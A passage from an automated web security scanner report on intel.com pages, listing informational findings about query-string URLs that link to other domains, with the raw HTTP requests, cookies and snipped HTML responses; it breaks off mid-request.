Date: Sat, 05 Feb 2011 23:20:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
</a>
<a id="LHC-investor-relations-menu" href="http://www.intc.com">Investor Relations</a>
...[SNIP]...
<li><a title="Twitter" href="http://www.twitter.com/intelcapital" target="_blank"><img height="23" width="23" alt="Twitter" src="http://blogs.intel.com/sitewide/pix/icons/icn-twitter-23.gif" /></a> <a href="http://www.twitter.com/intelcapital" target="_blank" title="Twitter">Twitter</a>
...[SNIP]...
<li><a title="YouTube" href="http://www.youtube.com/view_play_list?p=1C48A59E34F0BFD5" target="_blank"><img height="23" width="23" alt="YouTube" src="http://blogs.intel.com//sitewide/pix/icons/icn-youtube-23.gif" /></a> <a href="http://www.youtube.com/view_play_list?p=1C48A59E34F0BFD5" target="_blank" title="YouTube">YouTube</a>
...[SNIP]...
<li><a title="Flickr" href="http://www.flickr.com/photos/intelcapital/sets/" target="_blank"><img height="23" width="23" alt="Flickr" src="/Assets/Image/thumbnails/icn-flickr-23.png" /></a> <a href="http://www.flickr.com/photos/intelcapital/sets/" target="_blank" title="Flickr">Flickr</a>
...[SNIP]...
<li><a title="LinkedIn" href="http://www.linkedin.com/groups?gid=1846591&trk=hb_side_g" target="_blank"><img height="23" width="23" alt="LinkedIn" src="/Assets/Image/thumbnails/icn-linkedin-23.png" /></a> <a href="http://www.linkedin.com/groups?gid=1846591&trk=hb_side_g" target="_blank" title="LinkedIn">LinkedIn</a>
...[SNIP]...
<li><a href="https://www.intelportfolio.com/cps/newsletter/" title="Intel Capital News Bulletin">Intel Capital news bulletin &nbsp;&gt;</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
<br />
<a href="http://www.adobe.com/go/getflashplayer">
<img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" border="0"/>
</a>
...[SNIP]...

17.35. http://www.intel.com/about/companyinfo/diversity/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /about/companyinfo/diversity/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/about/companyinfo/diversity/index.htm?iid=subhdr+info_diversity
The response contains the following links to other domains:
  • http://www.adobe.com/go/getflashplayer
  • http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif
  • http://www.intc.com/
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /about/companyinfo/diversity/index.htm?iid=subhdr+info_diversity HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:40 GMT
Content-Length: 31698
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
</a>
<a id="LHC-investor-relations-menu" href="http://www.intc.com">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
<br />
<a href="http://www.adobe.com/go/getflashplayer">
<img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" border="0"/>
</a>
...[SNIP]...

17.36. http://www.intel.com/about/companyinfo/healthcare/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /about/companyinfo/healthcare/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/about/companyinfo/healthcare/index.htm?iid=subhdr+info_health
The response contains the following links to other domains:
  • http://www.adobe.com/go/getflashplayer
  • http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif
  • http://www.careinnovations.com/
  • http://www.intc.com/
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.intelstartnow.com/?cid=IHC_Home

Request

GET /about/companyinfo/healthcare/index.htm?iid=subhdr+info_health HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
</a>
<a id="LHC-investor-relations-menu" href="http://www.intc.com">Investor Relations</a>
...[SNIP]...
<p><a href="http://www.intelstartnow.com/?cid=IHC_Home" title="See how innovators are starting now to improve healthcare" target="_blank">See how innovators are starting now to improve healthcare&nbsp;&gt;</a>
...[SNIP]...
<p> <a title="Learn more" href="http://www.careinnovations.com/">Learn more&nbsp;&gt;</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
<br />
<a href="http://www.adobe.com/go/getflashplayer">
<img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" border="0"/>
</a>
...[SNIP]...

17.37. http://www.intel.com/about/companyinfo/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /about/companyinfo/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/about/companyinfo/index.htm?iid=gg_about+intel_companyinfo
The response contains the following links to other domains:
  • http://www.intc.com/
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /about/companyinfo/index.htm?iid=gg_about+intel_companyinfo HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:35 GMT
Content-Length: 28972
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
<h3><a href="http://www.intc.com" title="Investor Relations">Investor Relations &gt;</a>
...[SNIP]...
<span class="float-right"><a href='http://www.intc.com' title="Investor Relations"><img src="/Assets/Image/thumbnails/comp-info-investorrelations.jpg" alt="Investor Relations" />
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.38. http://www.intel.com/about/companyinfo/museum/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /about/companyinfo/museum/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/about/companyinfo/museum/index.htm?iid=subhdr+info_museum
The response contains the following links to other domains:
  • http://intel.regsvc.com/mainMenu.asp
  • http://www.adobe.com/go/getflashplayer
  • http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif
  • http://www.intc.com/
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /about/companyinfo/museum/index.htm?iid=subhdr+info_museum HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:39 GMT
Content-Length: 32604
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
</a>
<a id="LHC-investor-relations-menu" href="http://www.intc.com">Investor Relations</a>
...[SNIP]...
<li><a href="http://intel.regsvc.com/mainMenu.asp" title="Schedule a Tour" target="_blank">Schedule a Tour</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
<br />
<a href="http://www.adobe.com/go/getflashplayer">
<img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" border="0"/>
</a>
...[SNIP]...

17.39. http://www.intel.com/about/companyinfo/policy/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /about/companyinfo/policy/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/about/companyinfo/policy/index.htm?iid=subhdr+info_policy
The response contains the following links to other domains:
  • http://www.intc.com/
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /about/companyinfo/policy/index.htm?iid=subhdr+info_policy HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:39 GMT
Content-Length: 28058
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
</a>
<a id="LHC-investor-relations-menu" href="http://www.intc.com">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.40. http://www.intel.com/about/companyinfo/worldahead/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /about/companyinfo/worldahead/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/about/companyinfo/worldahead/index.htm?iid=subhdr+info_world
The response contains the following links to other domains:
  • http://www.adobe.com/go/getflashplayer
  • http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif
  • http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash
  • http://www.intc.com/
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /about/companyinfo/worldahead/index.htm?iid=subhdr+info_world HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a>
...[SNIP]...
</a>
<a id="LHC-investor-relations-menu" href="http://www.intc.com">Investor Relations</a>
...[SNIP]...
<noscript>
<a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" target="_blank">Get the Flash Plugin to see this Flash Banner.</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...
<br />
<a href="http://www.adobe.com/go/getflashplayer">
<img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" border="0"/>
</a>
...[SNIP]...

17.41. http://www.intel.com/about/corporateresponsibility/community/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /about/corporateresponsibility/community/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/about/corporateresponsibility/community/index.htm?iid=subhdr+cr_community
The response contains the following links to other domains:
  • http://www.adobe.com/go/getflashplayer
  • http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif
  • http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash
  • http://www.intc.com/?iid=subhdr+info_relations
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /about/corporateresponsibility/community/index.htm?iid=subhdr+cr_community HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; 